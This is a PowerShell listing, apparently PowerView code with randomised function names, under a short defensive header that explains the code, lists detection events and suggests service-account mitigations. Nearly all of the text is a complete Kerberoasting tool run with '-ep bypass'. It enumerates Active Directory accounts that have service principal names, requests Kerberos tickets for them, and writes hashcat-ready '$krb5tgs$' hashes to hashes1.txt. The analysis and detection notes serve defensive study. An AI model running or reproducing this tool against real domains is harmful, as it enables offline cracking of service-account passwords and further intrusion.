# ANALYST NOTES (defensive annotation; the code below is unchanged)
#
# What this is: a paste of six PowerShell functions with randomized names plus a
# final pipeline. The type names 'PowerView.User' and 'PowerView.SPNTicket' are
# kept, so this looks like renamed PowerView code (presumably renamed to defeat
# name-based signatures; the paste does not say).
#
# What the visible code does:
#   kjefhkajdfkj - builds a System.DirectoryServices.DirectorySearcher for a domain.
#   ewrewrn      - returns the current or named ActiveDirectory.Domain object.
#   fdsfdsfs     - converts an LDAP result's properties into a PSObject.
#   ewrewrnUser  - searches user objects, filter "(&(samAccountType=805306368)...)";
#                  with -SPN it adds "(servicePrincipalName=*)".
#   dgdsgfsdf    - requests a Kerberos service ticket per SPN through
#                  System.IdentityModel.Tokens.KerberosRequestorSecurityToken and
#                  formats the encrypted part as a "$krb5tgs$" string.
#   ooju         - chains the two above, skipping 'krbtgt'.
#   Final pipeline: "ooju -OutputFormat hashcat" writes the Hash field to hashes1.txt.
#
# Risk: the formatted output is intended for offline password guessing against
# service accounts; only directory reads and ordinary ticket requests are made.
#
# Detection points grounded in this listing:
#   - Command line containing "-ep bypass".
#   - Script block logging (event 4104) records the function bodies, so the strings
#     'KerberosRequestorSecurityToken', '$krb5tgs$', 'PowerView.SPNTicket' and
#     '(servicePrincipalName=*)' stay visible even though function names changed.
#   - On domain controllers, event 4769 (service ticket requested): one account
#     requesting tickets for many distinct SPNs. Delay defaults to 0 and the final
#     call passes no -Delay, so this invocation requests tickets back-to-back; the
#     Delay/Jitter parameters exist, so do not rely on rate alone.
#   - A new ASCII file named hashes1.txt in the working directory.
#
# Mitigation: long random passwords or group managed service accounts for every
# account carrying an SPN, AES-only encryption types where possible, and removal
# of SPNs that are no longer needed.
#
# NOTE(review): original line breaks were lost in extraction; the inline '#'
# comments below therefore run to the end of each physical line.
powershell -ep bypass function kjefhkajdfkj { [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('System.DirectoryServices.DirectorySearcher')] [CmdletBinding()] Param( [Parameter(ValueFromPipeline = $True)] [ValidateNotNullOrEmpty()] [String] $Domain, [ValidateNotNullOrEmpty()] [Alias('Filter')] [String] $LDAPFilter, [ValidateNotNullOrEmpty()] [String[]] $Properties, [ValidateNotNullOrEmpty()] [Alias('ADSPath')] [String] $SearchBase, [ValidateNotNullOrEmpty()] [String] $SearchBasePrefix, [ValidateNotNullOrEmpty()] [Alias('DomainController')] [String] $Server, [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] $SearchScope = 'Subtree', [ValidateRange(1, 10000)] [Int] $ResultPageSize = 200, [ValidateRange(1, 10000)] [Int] $ServerTimeLimit = 120, [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] [String] $SecurityMasks, [Switch] $Tombstone, [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) PROCESS { if ($PSBoundParameters['Domain']) { $TargetDomain = $Domain } else { # if not -Domain is specified, retrieve the current domain name if ($PSBoundParameters['Credential']) { $DomainObject = ewrewrn -Credential $Credential } else { $DomainObject = ewrewrn } $TargetDomain = $DomainObject.Name } if (-not $PSBoundParameters['Server']) { # if there's not a specified server to bind to, try to pull the current domain PDC try { if ($DomainObject) { $BindServer = $DomainObject.PdcRoleOwner.Name } elseif ($PSBoundParameters['Credential']) { $BindServer = ((ewrewrn -Credential $Credential).PdcRoleOwner).Name } else { $BindServer = ((ewrewrn).PdcRoleOwner).Name } } catch { throw "[kjefhkajdfkj] Error in retrieving PDC for current domain: $_" } } else { $BindServer = $Server } $SearchString = 'LDAP://' if ($BindServer -and ($BindServer.Trim() -ne '')) { $SearchString += $BindServer if ($TargetDomain) { $SearchString += '/' } } if 
($PSBoundParameters['SearchBasePrefix']) { $SearchString += $SearchBasePrefix + ',' } if ($PSBoundParameters['SearchBase']) { if ($SearchBase -Match '^GC://') { # if we're searching the global catalog, get the path in the right format $DN = $SearchBase.ToUpper().Trim('/') $SearchString = '' } else { if ($SearchBase -match '^LDAP://') { if ($SearchBase -match "LDAP://.+/.+") { $SearchString = '' $DN = $SearchBase } else { $DN = $SearchBase.SubString(7) } } else { $DN = $SearchBase } } } else { # transform the target domain name into a distinguishedName if an ADS search base is not specified if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) { $DN = "DC=$($TargetDomain.Replace('.', ',DC='))" } } $SearchString += $DN Write-Verbose "[kjefhkajdfkj] search string: $SearchString" if ($Credential -ne [Management.Automation.PSCredential]::Empty) { Write-Verbose "[kjefhkajdfkj] Using alternate credentials for LDAP connection" # bind to the inital search object using alternate credentials $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password) $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject) } else { # bind to the inital object using the current credentials $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) } $Searcher.PageSize = $ResultPageSize $Searcher.SearchScope = $SearchScope $Searcher.CacheResults = $False $Searcher.ReferralChasing = [System.DirectoryServices.ReferralChasingOption]::All if ($PSBoundParameters['ServerTimeLimit']) { $Searcher.ServerTimeLimit = $ServerTimeLimit } if ($PSBoundParameters['Tombstone']) { $Searcher.Tombstone = $True } if ($PSBoundParameters['LDAPFilter']) { $Searcher.filter = $LDAPFilter } if ($PSBoundParameters['SecurityMasks']) { $Searcher.SecurityMasks = Switch ($SecurityMasks) { 'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl } 'Group' { 
[System.DirectoryServices.SecurityMasks]::Group } 'None' { [System.DirectoryServices.SecurityMasks]::None } 'Owner' { [System.DirectoryServices.SecurityMasks]::Owner } 'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl } } } if ($PSBoundParameters['Properties']) { # handle an array of properties to load w/ the possibility of comma-separated strings $PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') } $Null = $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad)) } $Searcher } } function fdsfdsfs { [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('System.Management.Automation.PSCustomObject')] [CmdletBinding()] Param( [Parameter(Mandatory = $True, ValueFromPipeline = $True)] [ValidateNotNullOrEmpty()] $Properties ) $ObjectProperties = @{} $Properties.PropertyNames | ForEach-Object { if ($_ -ne 'adspath') { if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) { # convert all listed sids (i.e. if multiple are listed in sidHistory) $ObjectProperties[$_] = $Properties[$_] | ForEach-Object { (New-Object System.Security.Principal.SecurityIdentifier($_, 0)).Value } } elseif ($_ -eq 'grouptype') { $ObjectProperties[$_] = $Properties[$_][0] -as $GroupTypeEnum } elseif ($_ -eq 'samaccounttype') { $ObjectProperties[$_] = $Properties[$_][0] -as $SamAccountTypeEnum } elseif ($_ -eq 'objectguid') { # convert the GUID to a string $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid } elseif ($_ -eq 'useraccountcontrol') { $ObjectProperties[$_] = $Properties[$_][0] -as $UACEnum } elseif ($_ -eq 'ntsecuritydescriptor') { # $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 if ($Descriptor.Owner) { $ObjectProperties['Owner'] = $Descriptor.Owner } if ($Descriptor.Group) { $ObjectProperties['Group'] = $Descriptor.Group } if 
($Descriptor.DiscretionaryAcl) { $ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl } if ($Descriptor.SystemAcl) { $ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl } } elseif ($_ -eq 'accountexpires') { if ($Properties[$_][0] -gt [DateTime]::MaxValue.Ticks) { $ObjectProperties[$_] = "NEVER" } else { $ObjectProperties[$_] = [datetime]::fromfiletime($Properties[$_][0]) } } elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) { # convert timestamps if ($Properties[$_][0] -is [System.MarshalByRefObject]) { # if we have a System.__ComObject $Temp = $Properties[$_][0] [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low))) } else { # otherwise just a string $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0]))) } } elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) { # try to convert misc com objects $Prop = $Properties[$_] try { $Temp = $Prop[$_][0] [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low) } catch { Write-Verbose "[fdsfdsfs] error: $_" $ObjectProperties[$_] = $Prop[$_] } } elseif ($Properties[$_].count -eq 1) { $ObjectProperties[$_] = $Properties[$_][0] } else { $ObjectProperties[$_] = $Properties[$_] } } } try { New-Object -TypeName PSObject -Property $ObjectProperties } catch { Write-Warning "[fdsfdsfs] Error parsing LDAP properties : $_" } } function ewrewrn { 
[OutputType([System.DirectoryServices.ActiveDirectory.Domain])] [CmdletBinding()] Param( [Parameter(Position = 0, ValueFromPipeline = $True)] [ValidateNotNullOrEmpty()] [String] $Domain, [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) PROCESS { if ($PSBoundParameters['Credential']) { Write-Verbose '[ewrewrn] Using alternate credentials for ewrewrn' if ($PSBoundParameters['Domain']) { $TargetDomain = $Domain } else { # if no domain is supplied, extract the logon domain from the PSCredential passed $TargetDomain = $Credential.GetNetworkCredential().Domain Write-Verbose "[ewrewrn] Extracted domain '$TargetDomain' from -Credential" } $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password) try { [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) } catch { Write-Verbose "[ewrewrn] The specified domain '$TargetDomain' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_" } } elseif ($PSBoundParameters['Domain']) { $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain) try { [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) } catch { Write-Verbose "[ewrewrn] The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust : $_" } } else { try { [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() } catch { Write-Verbose "[ewrewrn] Error retrieving the current domain: $_" } } } } function dgdsgfsdf { [OutputType('PowerView.SPNTicket')] [CmdletBinding(DefaultParameterSetName = 'RawSPN')] Param ( [Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)] [ValidatePattern('.*/.*')] 
[Alias('ServicePrincipalName')] [String[]] $SPN, [Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)] [ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })] [Object[]] $User, [ValidateSet('NXB', 'Hashcat')] [Alias('Format')] [String] $OutputFormat = 'NXB', [ValidateRange(0,10000)] [Int] $Delay = 0, [ValidateRange(0.0, 1.0)] [Double] $Jitter = .3, [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) BEGIN { $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') if ($PSBoundParameters['Credential']) { $LogonToken = Invoke-UserImpersonation -Credential $Credential } } PROCESS { if ($PSBoundParameters['User']) { $TargetObject = $User } else { $TargetObject = $SPN } $RandNo = New-Object System.Random ForEach ($Object in $TargetObject) { if ($PSBoundParameters['User']) { $UserSPN = $Object.ServicePrincipalName $SamAccountName = $Object.SamAccountName $DistinguishedName = $Object.DistinguishedName } else { $UserSPN = $Object $SamAccountName = 'UNKNOWN' $DistinguishedName = 'UNKNOWN' } if ($UserSPN -is [System.DirectoryServices.ResultPropertyValueCollection]) { $UserSPN = $UserSPN[0] } try { $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN } catch { Write-Warning "[dgdsgfsdf] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName': $_" } if ($Ticket) { $TicketByteStream = $Ticket.GetRequest() } if ($TicketByteStream) { $Out = New-Object PSObject $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-' if($TicketHexStream -match 'a382....3082....A0030201(?<EtypeLen>..)A1.{1,4}.......A282(?<CipherTextLen>....)........(?<DataToEnd>.+)') { $Etype = [Convert]::ToByte( $Matches.EtypeLen, 16 ) $CipherTextLen = [Convert]::ToUInt32($Matches.CipherTextLen, 16)-4 $CipherText = 
$Matches.DataToEnd.Substring(0,$CipherTextLen*2) # Make sure the next field matches the beginning of the KRB_AP_REQ.Authenticator object if($Matches.DataToEnd.Substring($CipherTextLen*2, 4) -ne 'A482') { Write-Warning 'Error parsing ciphertext for the SPN $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq"' $Hash = $null $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-','')) } else { $Hash = "$($CipherText.Substring(0,32))`$$($CipherText.Substring(32))" $Out | Add-Member Noteproperty 'TicketByteHexStream' $null } } else { Write-Warning "Unable to parse ticket structure for the SPN $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq" $Hash = $null $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-','')) } if($Hash) { if ($OutputFormat -match 'NXB') { $HashFormat = "`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash" } else { if ($DistinguishedName -ne 'UNKNOWN') { $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' 
} else { $UserDomain = 'UNKNOWN' } # hashcat output format $HashFormat = "`$krb5tgs`$$($Etype)`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash" } $Out | Add-Member Noteproperty 'Hash' $HashFormat } $Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName $Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName $Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket') Write-Output $Out } # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) } } END { if ($LogonToken) { Invoke-RevertToSelf -TokenHandle $LogonToken } } } function ewrewrnUser { [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('PowerView.User')] [OutputType('PowerView.User.Raw')] [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')] Param( [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] [String[]] $Identity, [Switch] $SPN, [Switch] $AdminCount, [Parameter(ParameterSetName = 'AllowDelegation')] [Switch] $AllowDelegation, [Parameter(ParameterSetName = 'DisallowDelegation')] [Switch] $DisallowDelegation, [Switch] $TrustedToAuth, [Alias('KerberosPreauthNotRequired', 'NoPreauth')] [Switch] $PreauthNotRequired, [ValidateNotNullOrEmpty()] [String] $Domain, [ValidateNotNullOrEmpty()] [Alias('Filter')] [String] $LDAPFilter, [ValidateNotNullOrEmpty()] [String[]] $Properties, [ValidateNotNullOrEmpty()] [Alias('ADSPath')] [String] $SearchBase, [ValidateNotNullOrEmpty()] [Alias('DomainController')] [String] $Server, [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] $SearchScope = 'Subtree', [ValidateRange(1, 10000)] [Int] $ResultPageSize = 200, 
[ValidateRange(1, 10000)] [Int] $ServerTimeLimit, [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] [String] $SecurityMasks, [Switch] $Tombstone, [Alias('ReturnOne')] [Switch] $FindOne, [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty, [Switch] $Raw ) BEGIN { $SearcherArguments = @{} if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } $UserSearcher = kjefhkajdfkj @SearcherArguments } PROCESS { if ($UserSearcher) { $IdentityFilter = '' $Filter = '' $Identity | Where-Object {$_} | ForEach-Object { $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') if ($IdentityInstance -match '^S-1-') { $IdentityFilter += "(objectsid=$IdentityInstance)" } elseif ($IdentityInstance -match '^CN=') { $IdentityFilter += "(distinguishedname=$IdentityInstance)" if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname # and rebuild the domain searcher $IdentityDomain = 
$IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' Write-Verbose "[ewrewrnUser] Extracted domain '$IdentityDomain' from '$IdentityInstance'" $SearcherArguments['Domain'] = $IdentityDomain $UserSearcher = kjefhkajdfkj @SearcherArguments if (-not $UserSearcher) { Write-Warning "[ewrewrnUser] Unable to retrieve domain searcher for '$IdentityDomain'" } } } elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' $IdentityFilter += "(objectguid=$GuidByteString)" } elseif ($IdentityInstance.Contains('\')) { $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical if ($ConvertedIdentityInstance) { $UserDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) $UserName = $IdentityInstance.Split('\')[1] $IdentityFilter += "(samAccountName=$UserName)" $SearcherArguments['Domain'] = $UserDomain Write-Verbose "[ewrewrnUser] Extracted domain '$UserDomain' from '$IdentityInstance'" $UserSearcher = kjefhkajdfkj @SearcherArguments } } else { $IdentityFilter += "(samAccountName=$IdentityInstance)" } } if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { $Filter += "(|$IdentityFilter)" } if ($PSBoundParameters['SPN']) { Write-Verbose '[ewrewrnUser] Searching for non-null service principal names' $Filter += '(servicePrincipalName=*)' } if ($PSBoundParameters['AllowDelegation']) { Write-Verbose '[ewrewrnUser] Searching for users who can be delegated' # negation of "Accounts that are sensitive and not trusted for delegation" $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))' } if ($PSBoundParameters['DisallowDelegation']) { Write-Verbose '[ewrewrnUser] Searching for users who are sensitive and not trusted for delegation' $Filter += 
'(userAccountControl:1.2.840.113556.1.4.803:=1048574)' } if ($PSBoundParameters['AdminCount']) { Write-Verbose '[ewrewrnUser] Searching for adminCount=1' $Filter += '(admincount=1)' } if ($PSBoundParameters['TrustedToAuth']) { Write-Verbose '[ewrewrnUser] Searching for users that are trusted to authenticate for other principals' $Filter += '(msds-allowedtodelegateto=*)' } if ($PSBoundParameters['PreauthNotRequired']) { Write-Verbose '[ewrewrnUser] Searching for user accounts that do not require kerberos preauthenticate' $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' } if ($PSBoundParameters['LDAPFilter']) { Write-Verbose "[ewrewrnUser] Using additional LDAP filter: $LDAPFilter" $Filter += "$LDAPFilter" } # build the LDAP filter for the dynamic UAC filter value $UACFilter | Where-Object {$_} | ForEach-Object { if ($_ -match 'NOT_.*') { $UACField = $_.Substring(4) $UACValue = [Int]($UACEnum::$UACField) $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" } else { $UACValue = [Int]($UACEnum::$_) $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" } } $UserSearcher.filter = "(&(samAccountType=805306368)$Filter)" Write-Verbose "[ewrewrnUser] filter string: $($UserSearcher.filter)" if ($PSBoundParameters['FindOne']) { $Results = $UserSearcher.FindOne() } else { $Results = $UserSearcher.FindAll() } $Results | Where-Object {$_} | ForEach-Object { if ($PSBoundParameters['Raw']) { # return raw result objects $User = $_ $User.PSObject.TypeNames.Insert(0, 'PowerView.User.Raw') } else { $User = fdsfdsfs -Properties $_.Properties $User.PSObject.TypeNames.Insert(0, 'PowerView.User') } $User } if ($Results) { try { $Results.dispose() } catch { Write-Verbose "[ewrewrnUser] Error disposing of the Results object: $_" } } $UserSearcher.dispose() } } } function ooju { [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('PowerView.SPNTicket')] [CmdletBinding()] Param( [Parameter(Position = 0, 
ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] [String[]] $Identity, [ValidateNotNullOrEmpty()] [String] $Domain, [ValidateNotNullOrEmpty()] [Alias('Filter')] [String] $LDAPFilter, [ValidateNotNullOrEmpty()] [Alias('ADSPath')] [String] $SearchBase, [ValidateNotNullOrEmpty()] [Alias('DomainController')] [String] $Server, [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] $SearchScope = 'Subtree', [ValidateRange(1, 10000)] [Int] $ResultPageSize = 200, [ValidateRange(1, 10000)] [Int] $ServerTimeLimit, [Switch] $Tombstone, [ValidateRange(0,10000)] [Int] $Delay = 0, [ValidateRange(0.0, 1.0)] [Double] $Jitter = .3, [ValidateSet('NXB', 'Hashcat')] [Alias('Format')] [String] $OutputFormat = 'NXB', [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) BEGIN { $UserSearcherArguments = @{ 'SPN' = $True 'Properties' = 'samaccountname,distinguishedname,serviceprincipalname' } if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain } if ($PSBoundParameters['LDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $LDAPFilter } if ($PSBoundParameters['SearchBase']) { $UserSearcherArguments['SearchBase'] = $SearchBase } if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } if ($PSBoundParameters['Credential']) { $LogonToken = 
Invoke-UserImpersonation -Credential $Credential } } PROCESS { if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity } ewrewrnUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | dgdsgfsdf -Delay $Delay -OutputFormat $OutputFormat -Jitter $Jitter } END { if ($LogonToken) { Invoke-RevertToSelf -TokenHandle $LogonToken } } } ooju -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes1.txt